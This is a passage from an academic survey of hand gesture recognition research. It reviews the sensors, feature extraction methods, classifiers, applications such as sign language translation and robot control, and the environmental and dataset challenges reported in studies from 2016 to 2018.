glove had five flex sensors. Results showed that the vision-based technique was more stable and reliable compared to the data glove-based technique. Hand gestures are obtained by evaluating the contour captured from the image segmentation using a glove worn by the speaker in Rosalina et al. (2017). Also, in Danling, Yuanlong & Huaping (2016) they used a novel data glove called YoBu to collect data for gesture recognition. The work in Gunawardane & Nimali (2017) compared using a data glove to track the motion of the human hand using flex sensors, gyroscopes and vision data with Leap Motion Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 8/30 https://peerj.com https://doi.org/10.7717/peerjcs.218/fig-4 https://doi.org/10.7717/peerjcs.218/fig-5 http://dx.doi.org/10.7717/peerj-cs.218 Controller. Results showed that the Leap Motion Controller had a high repeatability and high potential for soft finger type applications. Furthermore, in Eko, Surya & Rafiidha (2017), Shaun et al. (2017) and Deepali & Milind (2016) the gestures are also captured using Leap Motion Controller. In Siji Rani, Dhrisya & Ahalyadas (2017) they used a new Hand Gesture Control in Augmented Reality System (HGCARS) where the gesture recognition is performed using a secondary camera and the reality is captured using an IP camera, the virtual object is added to the video feed obtained from an IP camera and controlled by using the position and depth of hand, measured using a webcam. Moreover, the authors of Salunke & Bharkad (2017), Rokhsana et al. (2017), Jessie et al. (2016) and Anshal, Heidy & Emmanuel (2017) used webcams for gathering input data. In Aditya et al. (2017), a hand gesture recognition on top-view hand images observed by a Time of Flight (ToF) camera in a car for touchless interactions inside a car was proposed. The help of image capturing devices installed on computer was implemented in Nilima & Patil (2017). The authors of Hafız et al. (2017) presented a CMSWVHG (Control MS Windows via hand Gesture) to perform numerous windows actions using hand gestures using internal or external camera for taking input with the help of OpenCV. To control OS on the projected screen for a virtual mouse system without any hardware requirement one camera source was required (Rishabh et al., 2016). Also, data acquisition was done using Camera interfacing in Ashish & Aarti (2016a) and Ashish & Aarti (2016b). To detect static hand gesture RGB cameras and depth data were used by Rytis & Arunas (2017) and Chenyang, Xin & Lianwen (2017), whereas in Chenyang, Xin & Lianwen (2017) they tested their approach on Sheffield Kinect Gesture (SKIG). A static hand gesture recognition using Kinect depth sensor to capture color, and infrared and depth frames was applied by Fuchang & Hijian (2016), Xiang, Lei & Qiang (2017), Jozef & Slavomír (2017), Sih-Huei et al. (2017) and Yiwen et al. (2017). Moreover, the authors proposed a Kinect based real time dynamic hand gesture recognition technique in Atharva & Apurv (2017), Devendrakumar & Kakade (2016) and Karthik et al. (2017). A real time wearable hand gesture recognition system, which decoded the information from surface electromyography (sEMG) was proposed in Jian et al. (2017), Jinxing, Jianhong & Jun (2017), David & Donghan (2018), Kuang-Yow et al. (2017), Jakub, Tomasz & Piotr (2017), Shunzhan et al. (2017) and Andrés & Marco (2017). Also, a real time system based on the EMG with the surface electromyography measured by the commercial sensor Myo which is an armband placed on the forearm was proposed by Marco et al. (2017a), Marco et al. (2017b), Karthik et al. (2017) and Stefano et al. (2018). In Yuhui, Shuo & Peter (2018), Yuta et al. (2017), Donq-Liang & Wei-Shiuan (2018), Ananta & Piyanuch (2016) and Nabeel, Rosa & Chan (2017) a sensor-based wearable wristband was presented for static hand gestures. The authors in Hari et al. (2016) and Erhan, Hakan & Baran (2017) presented making use of the sensors in smartphones. The authors of Yifan et al. (2018) used wearable devices such as VR/AR helmet and glasses in a gesture recognition system. A Doppler radar sensor with dual receiving channels was used to acquire a big database of hand gestures signals in Jiajun & Zhiguo (2017). A Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 9/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 gesture recognition system for human–computer interaction based on 24 GHz radars in Shengchang et al. (2017) and 2.4-GHz continuous radar in Takuya et al. (2017) were used. Moreover, an interface based on a mechanomyography (MMG) signal to capture arm movement and hand gesture was applied in Yuntao et al. (2017) and Piotr, Tomasz & Jakub (2017). The work of Ibrahim et al. (2018) proposed a hand gesture system using two monopole antennas to measure signatures at different locations, and the work of Zengshan et al. (2018) developed a wireless sensing WiCatch, where the motion locus of the gesture is developed by constructing virtual antenna array based on signal samples. Feature extraction Hand tracking process is the ability of the computer to trace the user hand and separate it from the background and from the surrounding objects (Ananya, Anjan Kumar & Kandarpa Kumar, 2015). This can be done using multi-scale color feature hierarchies that gives the users hand and the background different shades of colors to be able to identify and remove the background, or by using clustering algorithms that are capable of treating each finger as a cluster and removing the empty spaces in-between them. In this subsection, we will be discussing the different features used by the different applications implemented in the reviewed work. Furthermore, the feature extraction methods used will also be discussed. Feature extraction methods. Feature extraction methods are used in order to extract the useful information from the images that helps in the recognition process of gestures. These features can be extracted using several methods available, such as Fourier descriptor method which captures the palm, the fingers and the finger tips, or centroid method which captures the essential structure of the hand. The work of Haitham, Alaa & Sabah (2017) applied two methods of feature extraction, a contour hand and complex Alhzat. In Weiguo et al. (2017) feature extraction module was applied using Discrete Fourier Transform (DFT) operations of histograms (vertical and horizontal). The proposed approach of Salunke & Bharkad (2017) took the input data from a portable webcam then processed the images and after that extracted a histogram of gradients features. The objective of Himadri et al. (2018) was to do segmentation of the hands using polygon approximation and approximate convex decomposition, then record the unique features between various convex segments of the hand as a method of feature extraction. Regional Contrast (RC) based salient object extraction algorithm, and a method using the color statistics of image were used in Qingrui et al. (2017). To detect the start and end points of gestures a gesture spotting algorithm was applied in Hari et al. (2016). Experiments of Chenyang, Yingli & Matt (2016) followed five different feature extraction strategies; depth image sequence, body joints & facial landmarks, hand shapes & facial expressions/attributes. In Jose et al. (2017), digital image processing techniques were used to eliminate noise, to improve the contrast under different illumination, to separate the hand from the background and to cut the region containing the hand. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 10/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 Histogram of Oriented Gradients (HOG) was used in Vimonhak, Aranya & Somsak (2017) for image processing to extract characteristics of the hand. In the work of NilimaS2017, the Accurate End Point Identification method was implemented and applied on gesture images which were captured in varying backgrounds to detect edge points and branch points and it was also applied on blurred images containing multiple objects. The authors of Isack, Zhongfu & Jamal (2017) employed higher order local autocorrelation (HLAC) feature extraction method. The authors of Xi, Chen & Lihua (2017) proposed using Wavelet Invariant Moments, the hand region was separated based on the depth information, and the wavelet feature was calculated by enforcing the wavelet invariant moments of the hand region, and the distance feature was extracted by calculating the distance from fingers to hand centroid. Feature extraction like time, frequency and time-frequency were used in Jiajun & Zhiguo (2017) and Andrés & Marco (2017). Authors of Chenyang, Xin & Lianwen (2017) used a robust feature, path signature (PS) and its compressed version, log path signature (LPS) to extract effective features of hand gestures. Discrete wavelet transformation and singular value decomposition were used for features extraction, a genetic algorithm with effective fitness function was used to select optimal features by eliminating redundant and irrelevant features for improving the recognition performance of the system in Rasel et al. (2017). In Rania, Mohammed & Mahmoud (2017) system for HGR that is based on dimensionality reducing the histogram of oriented gradients feature vectors by applying principal component analysis was implemented. A hand gesture recognition method based on salient feature point selection was proposed in Yiwen et al. (2017), the shape feature of hand gesture was extracted from the contour, and the salient feature points were selected by a new algorithm to represent the hand gesture. In experiments of Vivek, Ramesh & Kagalkar (2017) image processing techniques like outline investigating based on edge recognition, wavelet change, disintegration, widening, obscure disposal, and commotion end were used, they also used Histogram Orientation Gradient called HOG for shape highlight extraction and most vital part investigation for list of capabilities streamlining and diminishment. They also used a polygonal shape approximation strategy with a special chain-coding for shape-similarity matching in Oyndrila et al. (2016). In Vladislava, Predrag & Goran (2016) recognition was for 10 hand gestures, images were captured on two different backgrounds and with several space orientations, and histogram of Oriented Gradients method was applied for feature extraction. The Gaussian Mixture Models (GMM) based on human skin pixels and tracks segmented foreground using optical flow to detect hand swipe direction was proposed in Srinidhi et al. (2016). Authors of Ananta & Piyanuch (2016) employed Daubechies wavelet transforms for feature extraction. In Rajeshree & Jayashree (2016) they proposed a new method to find flow of hand for special signs using chain code, and recognition technique of signs (Dynamic digits) that is independent of size and color of hand using binary images. In Ashish & Aarti (2016a) and Ashish & Aarti (2016b) feature extraction was done using Blob Detection and Contour extraction. In Jessie et al. (2016) image processing techniques such as: color segmentation, visual-hand tracking, pre-processing, and feature extraction were used. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 11/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 In Ashish & Aarti (2016a) and Ashish & Aarti (2016b) features were extracted using Color jiltering and skin segmentation, convexity hull algorithm was implemented just for finger point detection and number recognition. Where in Lalit & Pritee (2017), an acquisition module that spots the legitimate gesture trajectory by implementing pen-up and pen-down actions using depth thresholding and velocity tracking was proposed, the extracted trajectory is recognized using the equipolar signature (EPS) technique. Conventional method was used in Devendrakumar & Kakade (2016) to utilize separation of hand from surrounding environment and then find palm points. Each hand part in Shome (2017) was modeled as a convex hull and pairwise distance between the parts was calculated using GJK-EPA algorithm. Principal Component Analysis (PCA) was used in Marlon, Alistair & Mohamed (2016) to reduce the dimensionality and extract features of images of the human hand. The work in Anshal, Heidy & Emmanuel (2017) processed the hand gesture image by combining image segmentation and edge detection to extract morphological information, and frames were processed using the multi-modality technique used for processing individual characters. In Vedha Viyas et al. (2017) to improve recognition rate of hand gestures, various image processing techniques were used such as Histogram Equalization, Median filtering, Average filtering, and Morphological filtering, feature extraction image matching was done using cross-correlation co-efficient. The proposed techniques in Riya et al. (2017) relied on multiple representations namely HOG, GIST and BSIF, they used feature fusion which is the process of combining two feature vectors to obtain a single feature vector. Extraction of a series of features based on convex defect detection a model was proposed in Soukaina et al. (2018), taking advantage of the close relationship of convex defect and fingertips. Features extracted. The features extracted change from one application to another, some of the features that could be taken into consideration are: fingers status, thumb status, skin color, alignments of fingers, and the palm position (Ananya, Anjan Kumar & Kandarpa Kumar, 2015). There are several features that could be considered and extracted from the hand gestures which are highly dependent on the application. Skin color feature was used in Weiguo et al. (2017), Xiang, Lei & Qiang (2017), Rokhsana et al. (2017). Hand gestures in Himadri et al. (2018) were represented by hand shapes, orientations and movement of the hands, alignments of the fingers, and the palm position. In David & Donghan (2018) open hand, wrist radial deviation, ulnar deviation, wrist extension, wrist flexion, and closed fist were considered. Scale, rotation, translation, illumination, noise and background were extracted in the work of Jose et al. (2017). In Yuta et al. (2017) finger movements were observed because the muscles and bones on the back of the hand are linked to the fingers, also skin deformation was measured by the distance between the device and skin with sensors. The classifier in Piotr, Tomasz & Jakub (2017) had five gestures (fist, pronation, supination, flexion, extension) and the feature vector consisted of 18 features: five representing muscle activity (RMS) and 13 parameters corresponding to relative sensor orientation. A feature vector which was composed of wavelet invariant moments and Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 12/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 distance feature was generated by the work of Xi, Chen & Lihua (2017). The authors of Shunzhan et al. (2017) extract five eigenvalues in the time domain. Geometric features such as area and centroid were extracted from each video frame to capture the trajectory of the moving hand and compare it with the training gestures in the experiments of Atharva & Apurv (2017). The features used in Gunawardane & Nimali (2017) were: position, orientation, velocity and acceleration, bending angle of the fingers. To represent the global movement of hand skeleton the global motion features were extracted by Xinghao et al. (2017). In experiments of Sih-Huei et al. (2017) the hand region is recognized by using information about the skeleton of the segmented depth images, then a histogram of the oriented normal 4D (HON4D) and a histogram of oriented gradient (HOG) were extracted to represent the motion patterns. For each hand gesture type, occlusion, light, shadow and background were considered as features in Biyao et al. (2017), whereas the work of Anna, Sung & Jae-Gon (2018) presented a detection method that utilizes depth image obtained by incoming stereo image sequences and skin color information in a combined way, then a detected hand contours based on Bezier curve to provide an interoperable interface between a detection module and a recognition module was also presented, and a set of hand gestures with a combination of open fingers and rotational angles were used for the hand gesture recognition of their system. The proposed system (Oyndrila et al., 2016) identified hand-palm in video stream based on skin color and background subtraction scheme. Where in Rishabh et al. (2016) glove tracking was done and then fingertips were detected with respect to centroid of the hand. Features used in Ashish & Aarti (2016a) and Ashish & Aarti (2016b) were orientation, Centre of mass centroid, fingers status, thumb in positions of raised or folded fingers of hand. On the other hand, features extracted in Soumya & Muzameel (2017) were size, shape, color or texture. Flexion, extension, abduction and grasp of forearm muscles features were used to detect four different movements of the wrist (Stefano et al., 2018). The features had to be able to characterize gestures, and invariant under translation and rotation of hand gesture to ensure reliable recognition in Soukaina et al. (2018). Classification of hand gestures The features extracted are sent to training and testing the classification algorithm (such as Artificial Neural Networks (ANN), K-nearest neighbor (KNN), Naive Bayes (NB), Support Vector Machine (SVM), etc.) to reach the output gesture, for example the output gesture in a simple case can contain two classes to detect only two gestures such as open and closed hand gestures, or in sign language as shown in Fig. 2. The classification of the information extracted from the images of hand gestures is required to be able to recognize these gestures by the computer, there are several classification algorithms that can be used for this purpose. The work of Haitham, Alaa & Sabah (2017), Weiguo et al. (2017), Rosalina et al. (2017), Jakub, Tomasz & Piotr (2017), Piotr, Tomasz & Jakub (2017), Shunzhan et al. (2017), Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 13/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 Erhan, Hakan & Baran (2017), Vladislava, Predrag & Goran (2016), Deepali & Milind (2016) and Ananta & Piyanuch (2016) proposed using Artificial Neural Networks (ANN) for classification, whereas in Jakub, Tomasz & Piotr (2017) and Piotr, Tomasz & Jakub (2017) SoftMax output layer was used with feedforward ANN; in Shunzhan et al. (2017), Erhan, Hakan & Baran (2017), Alvi, Fatema & Mohammad (2016), Vladislava, Predrag & Goran (2016); Deepali & Milind (2016) and Ananta & Piyanuch (2016) backpropagation training methods were used, and the authors in Jessie et al. (2016) used Kohonen self- organizing maps as a type of ANN to classify data sets in unsupervised manner to convert hand gestures into Filipino words. In Chun-Jen et al. (2017), a synthetically-trained neural network was used for 3D hand gesture identification. The training process of a deep-learning neural network required a large amount of training data. The authors of Chenyang, Xin & Lianwen (2017) proposed using the LPSNet, an end-to-end deep neural network for hand gesture recognition with novel log path signature features. In Yifan et al. (2018) and Biyao et al. (2017) they proposed using deep neural networks for classification. The authors in Sungho & Wonyong (2016) came up with two dynamic hand gesture recognition techniques using low complexity recurrent neural network (RNN) algorithms for wearable devices, the first was based on video signal and uses convolutional neural network (CNN) with RNN for classification, and the other used accelerometer data and applied RNN for classification. In contrast, Xinghao et al. (2017) used a bidirectional recurrent neural network (RNN) with the skeleton sequence to augment the motion features for RNN were used. Deep convolutional neural network was used for classification in Ibrahim et al. (2018), David & Donghan (2018), Javier, Paula & Robinson (2017), Jose et al. (2017), Aditya et al. (2017), Yuntao et al. (2017), Peijun et al. (2017), Jozef & Slavomír (2017), Jiajun & Zhiguo (2017), Takuya et al. (2017) and Fabian et al. (2017), where in Aditya et al. (2017) the authors aimed to improve the detection of hand-gestures by correcting the probability estimate of a Long-Short-Term Memory (LSTM) network by pose prediction performed by a Convolutional Neural Network (CNN). They used Principal Component Analysis (PCA) as a training procedure to reduce the labelled data of hand pose classification to perfect the initialization of weights for the CNN. The authors in Fuchang & Hijian (2016), Salunke & Bharkad (2017) and Marlon, Alistair & Mohamed (2016) used K-nearest neighbor (KNN) classifier to recognize hand gestures. The work presented in Kuang-Yow et al. (2017) classified the recognition using k-Nearest Neighbor (KNN) and Decision Tree algorithms combination. Support vector machine (SVM) was used for classification in Yuhui, Shuo & Peter (2018), Chenyang, Yingli & Matt (2016), Yuta et al. (2017) Xi, Chen & Lihua (2017), Rasel et al. (2017), Reshna & Jayaraju (2017), Zengshan et al. (2018), Ashish & Aarti (2016a), Ashish & Aarti (2016b), Zhiwen et al. (2017) and Stefano et al. (2018). Decision tree was used to classify the gestures in Shengchang et al. (2017). To recognize the patterns in Jian et al. (2017), they used a modified deep forest algorithm. In Shaun et al. (2017) and Riya et al. (2017), they used a random regression forest algorithm for classification. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 14/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 In Jinxing, Jianhong & Jun (2017) the hand gesture was modeled and decomposed by the use of Gaussian Mixture Model-Hidden Markov Models (GMMHMM), GMMs are used as sub-states of HMMs to decode sEMG feature of gesture. Moreover, a hand gestures recognition system was implemented using the incorporation of Bhattacharyya divergence into Bayesian sensing hidden Markov models (BS-HMM) in Sih-Huei et al. (2017). Also, in Devendrakumar & Kakade (2016) Hidden Markov Model was used for classification. The work of Hari et al. (2016), Atharva & Apurv (2017), Yiwen et al. (2017) and Washef, Kunal & Soma (2016) presented using the dynamic time warping algorithm for classification. Whereas Marco et al. (2017a) and Marco et al. (2017b) used the k-nearest neighbor rule together with the dynamic time warping algorithm for classification. Naive Bayes was applied as the training method for classification of Eko, Surya & Rafiidha (2017). Multiple linear discriminant analysis (LDA) classifier was adopted to classify different hand gestures in Isack, Zhongfu & Jamal (2017) and Yuefeng et al. (2016). Classification of digits gesture from 11 to 20 was done using Principal component analysis by Rajeshree & Jayashree (2016). The work (Danling, Yuanlong & Huaping, 2016) used extreme learning machine (ELM) for gesture recognition. The work presented in Himadri et al. (2018) used Support Vector Machine (SVM), Artificial Neural Network, Naive Bayes and K-Nearest Neighbor (K-NN) classifiers as the training methods to recognize the features extracted. In contrast, in Ananyaa et al. (2017) the best classification accuracy was achieved using Euclidean distance and Eigen vector, but this result is for a very small dataset, and the best result was a dataset containing nearly 720 images that used Support vector machine for classification of images; also, using Artificial Neural Network provided an accuracy of 89.48%. Furthermore, Multi-class Support Vector Machine (SVM) and k-Nearest Neighbors (KNN) classifiers were used to classify the hand gestures in Rania, Mohammed & Mahmoud (2017), experiments showed that the accuracy of KNN classifier were better than SVM classifier. In Nabeel, Rosa & Chan (2017) Support Vector Machine (SVM), Decision Tree (DT), K-Nearest Neighbors (KNN), and Linear Discriminant Analysis (LDA) were compared in classification performance, and results showed that LDA got the highest accuracy. Hand gesture recognition applications Hand gestures can be used as a natural communication with the computer; with today’s technologies, the number of applications that could apply hand gesture recognition is rapidly increasing. In this section, we will be discussing the most recent applications that were presented in the years 2016 to 2018. Sign language Sign languages, as illustrated in Fig. 2, use manual communication to explain a certain meaning. This can include using hand gestures, movements, fingers orientation to deliver a certain word or meaning. The work of Weiguo et al. (2017), Chenyang, Yingli & Matt (2016), Rasel et al. (2017), Shaun et al. (2017), Deepali & Milind (2016), Nabeel, Rosa & Chan (2017); and Anshal, Heidy & Emmanuel (2017) proposed using hand gesture recognition for American Sign Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 15/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 Language (ASL) for people who are hearing impaired, whereas in Shaun et al. (2017) they did not evaluate the letters that are dynamic (like: j and z). In Nabeel, Rosa & Chan (2017) 36 gestures were studied including 26 ASL alphabets and 10 ASL numbers. In Anshal, Heidy & Emmanuel (2017) two different translation paradigms; English characters (alphabet) and complete words or phrases were proposed. An alternative to talking for deaf & dumb people who have hearing or speech problems using sign language recognition and hand gestures was proposed in Himadri et al. (2018), Oinam et al. (2017), Reshna & Jayaraju (2017), Vivek, Ramesh & Kagalkar (2017), Oyndrila et al. (2016), Ashish & Aarti (2016a), Ashish & Aarti (2016b) and Rishabh et al. (2016). Whereas in Rosalina et al. (2017) a sign language that consists of the alphabetic from ‘‘A’’ to ‘‘Z’’, the numbers from ‘‘0’’ to ‘‘9’’, and some additional punctuation marks like ‘‘Period’’, ‘‘Question Mark’’, and ‘‘Space’’ using static hand gesture recognition was produced. The work of Jose et al. (2017) used the alphabet of sign language of Peru (LSP). Also, Vimonhak, Aranya & Somsak (2017) proposed a technique for the recognition of Lao alphabet sign language for the deaf people. In Eko, Surya & Rafiidha (2017), Indonesian Sign Language System (SIBI) was applied for normal people to learn sign language and communicate to people with hearing disability. Moreover, in Donq-Liang & Wei-Shiuan (2018), the authors used 29 Turkish fingerspelling signs. A framework for recognizing Sinhala sign language gestures and translating them in to natural language for hearing & speaking impaired people was proposed in Vladislava, Predrag & Goran (2016). The authors of Jessie et al. (2016) converted hand gestures into Filipino words. The work presented in Marlon, Alistair & Mohamed (2016) used the alphabet of Irish Sign Language. Finally, Indian Sign Language (ISL) hand gesture recognition system was introduced in Riya et al. (2017). Robotics Hand gestures can also be employed in the process of building robotics, as illustrated in Fig. 6 (Elecbits, 2019) which shows the use of a glove to control a robotic vehicle. A recognition frame of continuous hand gestures of upper-limb exoskeleton robot was proposed in Jinxing, Jianhong & Jun (2017). In Yuhui, Shuo & Peter (2018) they had three groups of hand gestures: six wrist gestures, five single finger flexions, and ten Chinese number gestures that were built to control a robotic arm. The authors of Sungho & Wonyong (2016) came up with two dynamic hand gesture recognition techniques using low complexity recurrent neural network (RNN) algorithms for a wearable device. The experiments of Xiang, Lei & Qiang (2017) produced a control system for robotic wheelchair for the aged and the disabled, which contained two parts: gesture interaction and intelligent wheelchair. Also, the approach of Javier, Paula & Robinson (2017) allowed the consequent execution of a robotic agent for the delivery of objects. In Yuntao et al. (2017) the authors introduced a wearable sensor suite fusing arm motion and hand gesture recognition for operator control of UAVs. The authors of Yuta et al. (2017) proposed a wearable device with photo-reflective sensors arranged in an array to recognize hand gestures by measuring the skin deformation Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 16/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 Figure 6 Example of the use of hand gestures in robotics (Elecbits, 2019). Full-size DOI: 10.7717/peerjcs.218/fig-6 of the back of the hand. Also, in Danling, Yuanlong & Huaping (2016) hand gestures recognition was used in human–robot interaction (HRI). In experiments of Devendrakumar & Kakade (2016), continuous trajectory path made by hand over a period of time was considered for real time dynamic gesture recognition purpose using Kinect sensor for controlling robotic arm. A hand gesture-based control design was proposed for mobile robots in Hang et al. (2017), where mobile robots can move according to the signals encoded by hand gestures. Work of Vedha Viyas et al. (2017) dealt with a robotic arm using hand gestures for many applications such as automation, medical applications and gaming. Others A static hand gesture recognition in a real-time human–computer interaction application was proposed in Salunke & Bharkad (2017) to control the Power Point presentations from a distance. A human–computer interaction based on hand gesture in a projector-camera system was presented in Qingrui et al. (2017). Also, real-time hand gesture recognition for flight control of multiple quadrotors was applied in David & Donghan (2018). The authors of Javier, Paula & Robinson (2017) presented the design of a convolutional neural network architecture using the MatConvNet library in order to achieve the recognition of 2 classes: ‘‘open’’ and ‘‘closed’’ and ‘‘unknown’’. The approach studied in Marco et al. (2017a) and Marco et al. (2017b) could be used in multiple applications in medical and engineering fields. The study of Aditya et al. (2017) showed hand gesture recognition on top-view hand images observed by a Time of Flight (ToF) camera in a car for touchless interactions inside a car. In Peijun et al. (2017) they used seven kinds of hand gestures that can command a consumer electronics device, such as mobile phones and TVs. The authors in Siji Rani, Dhrisya & Ahalyadas (2017) proposed an Augmented Reality (AR) to merge the virtual world into the real world and to enhance the perception of the real world by adding 2-D virtual objects. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 17/30 https://peerj.com https://doi.org/10.7717/peerjcs.218/fig-6 http://dx.doi.org/10.7717/peerj-cs.218 The experiments of Yu et al. (2017) described a method of hand gesture recognition using Principle Component Analysis (PCA) implemented in Android phone. A real-time hand gesture recognition system was proposed using electromyography (EMG) in the field of medicine and engineering, with a higher number of gestures to recognize in Marco et al. (2017a) and Marco et al. (2017b). The work of Rokhsana et al. (2017) presented a hand gesture-based computer mouse control system. The authors of Hafız et al. (2017) presented a CMSWVHG (Control MS Windows via hand Gesture) to perform numerous windows actions using hand gestures. The work discussed in Anna, Sung & Jae-Gon (2018) presented a method to detect and to recognize hand gestures for generating hand gesture-based commands to control the media consumption in smart glasses. Hand gesture recognition or finger angle prediction for Ultrasound imaging was proposed in Yuefeng et al. (2016). A hand gesture recognition technique on a smartphone using Google Cardboard (GC) and Wearality2 in phones was applied in Srinidhi et al. (2016). A real-time hand gesture recognition technique for presentation was proposed in Rishabh et al. (2016), to control OS on the projected screen for a virtual mouse system without any hardware requirement. Hand-gesture-based commands were proposed in Lalit & Pritee (2017) to replace touch and electromechanical input panels using vision-based mid-air character input. Gesture recognition system was proposed in Soumya & Muzameel (2017), Mudra is an expressive form of gesture that is mainly used in Indian classical dance form where the gesture is in visual form to connect with the audience. The authors in Zhiwen et al. (2017) presented a real-time hand gesture recognition by using Kinect sensor, to control mouse by user hands for operations such as ‘clicking’, ‘dragging’ and ‘dropping’, and engaged/disengaged gestures. Gesture recognition in Karthik et al. (2017) was used for Bio Robotics, the paper focused on presenting a sensor based human gesture recognition for the Hand Cricket game. Hand gesture recognition challenges The process of hand gestures recognition consists of a set of complex steps that has many possible difficulties that could stand in the way of having accurate recognition. In this section, we will discuss the major environmental surroundings challenges and the training and testing dataset challenges that could occur. Environmental surroundings In Fuchang & Hijian (2016) the environmental background, light and rotation, translation and scale change proposed a difficulty; the authors used depth data to help in hand separation and to accomplish a synchronized color and depth images in Kinect. Different light brightness (dull, medium, and bright) conditions were tested in Salunke & Bharkad (2017) to overcome their problem, the results of the bright light level gave the best accuracy as expected. Furthermore, the results of Oinam et al. (2017) showed that the vision-based techniques gave an accuracy of 100% in bright lighting condition with a white background. The work of Qingrui et al. (2017) showed that it was difficult to achieve proper accuracy when having complex backgrounds, variable external illumination, and shadows of hand Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 18/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 gesture. The authors of Hari et al. (2016) presented a continuous hand gestures recognition technique using three-axis accelerometer and gyroscope sensors in smartphones, a gesture coding algorithm was also used to reduce the influence of unstableness of the user hand. Digital image processing techniques were used in Jose et al. (2017) to eliminate noise, to improve the contrast under different illumination, to separate the hand from the background and to cut the region containing the hand, where results of images with complex background got low accuracy. In Rytis & Arunas (2017) the authors suggested that RGB cameras can be used to detect hand, but it has limited applications because hand detection was hard in some lighting conditions or in different skin colors, using depth camera data was better in distinguishing hands in front of camera. Study of Peijun et al. (2017) suggested that spatial localization of the hands when it contains background, human face, and human body could be a challenging task, where the results achieved an accuracy of 97.1% in the dataset with simple backgrounds and 85.3% in the dataset with complex backgrounds. The authors of Yu et al. (2017) were capable of solving the problems that faced them such as different size of gesture image captured, different angle of gesture’s rotation and flipped gesture. After experiments of Atharva & Apurv (2017) they found that if there was a larger object than the hand that the Kinect captures, wrong results will be achieved. The results of Hafız et al. (2017) were highly affected by the background noise where they achieved an accuracy of 82.52%. In experiments of Yifan et al. (2018) and to strengthen the recognition accuracy, and as the dataset used contained more than 24,000 gesture and 3,000,000 frames for both color and depth modalities from 50 subjects, they tested 83 different static and dynamic gestures with six diverse indoor and outdoor scenes respectively with variation in background and illumination, they also tested when people perform gestures while they are walking and they achieved an acceptable accuracy. In Reshna & Jayaraju (2017) The authors used complex backgrounds with respect to the skin color, and results showed a disadvantage in this system which was the lighting conditions. The results of Rania, Mohammed & Mahmoud (2017) showed that the proposed algorithm achieved recognition rate of 97.69% under different hand poses and complex background with changes in lightning, moreover their system was robust to rotation, scale, translation, and lighting. Also, the results of Yiwen et al. (2017) showed that their method was adjusting to translation, rotation scaling and articulated deformation. Time of Flight (ToF) data was used in Fabian et al. (2017) which tends to be overly noisy depending on various factors such as illumination, reflection coefficient and distance that were studied in their research process. The system of Washef, Kunal & Soma (2016) overcame the limitations of a glove-based approach and the vision-based approach concerning different illumination conditions, background complexity and distance from camera. The system in Lalit & Pritee (2017) was applicable for rotation, scale, and translation variations, directions, and the dataset contained digits, alphabets, and symbols. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 19/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 Training and testing Data The training and testing data problems can be classified as either having a small set of gestures that are insufficient for recognition training or having a large set of gestures that are imbalanced leading to a low recognition accuracy. The training data of Haitham, Alaa & Sabah (2017) had only 25 images and the results reached an accuracy of 82.2%. In Weiguo et al. (2017) they trained their system using 24 static American Sign Language (ASL) and their accuracy reached 93.3%, whereas in Fuchang & Hijian (2016) they used detailed features to avoid the problem of having imbalanced data and images. To overcome the problem of having more than one meaning and move to represent a gesture the authors of Oinam et al. (2017) used vision-based hand gesture recognition systems and data glove-based hand gesture recognition systems. In Jian et al. (2017) 16 hand gestures include 10 dynamic and six static gestures were used, and results showed that gestures were correctly recognized and the accuracy was 96%. The work in Ibrahim et al. (2018) tested the system using ten hand gestures achieving their goal which is to maximize the recognition accuracy using Pre-trained networks. The data of Javier, Paula & Robinson (2017) contained six architectures with variance in the hyperparameters and depth, their results achieved good accuracy. Classification of 24 hand gestures to improve the rate of recognition accuracy was proposed in Jose et al. (2017) reaching 96.20% for simple backgrounds. In Aditya et al. (2017) five hand poses with nine class hand gestures were used reaching an accuracy of 89.50% as a result. The work of Vimonhak, Aranya & Somsak (2017) used 54 Lao alphabets in the experiments, testing data had 540 gestures from four individuals, it was difficult to maintain constant speed of hand gestures, thus the recognition rate was 79%. The main difficulties of the hand gesture recognition (Andrés & Marco, 2017) with EMG using machine learning are: the noisy behavior of EMG signal, and the small number of gestures per person relative to the number of generated data by each gesture (overfitting). Whereas, in Chun-Jen et al. (2017) the training process of a deep-learning neural network required a large amount of training data, they combined a large set of computer-generated 3D hand images with few real camera images to form the training data set, the testing and training sets had 24 classes of hand gestures, and the results accuracy was 77.08%. The authors of Deepali & Milind (2016) considered 26 different alphabets of American Sign Language, with a total of 520 samples (consisting of 20 samples of each alphabet), and results gave an accuracy of 96.15%. In study of Stefano et al. (2018) to avoid correlation between training and testing datasets the Leave One Subject Out (LOSO) cross-validation technique was used, and the accuracy was 92.87%. THE FUTURE OF HAND GESTURE RECOGNITION Despite the high performance of some of the recent methods discussed in this research, the hand gesture recognition is still an evolving topic that needs more experiments. Hand gesture recognition method also needs to be extended to cover all of the areas of information technology and artificial intelligence, such as tablets, smartphones, gaming consoles, smart televisions, laptops and desktops (Hexa, 2017). Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 20/30 https://peerj.com 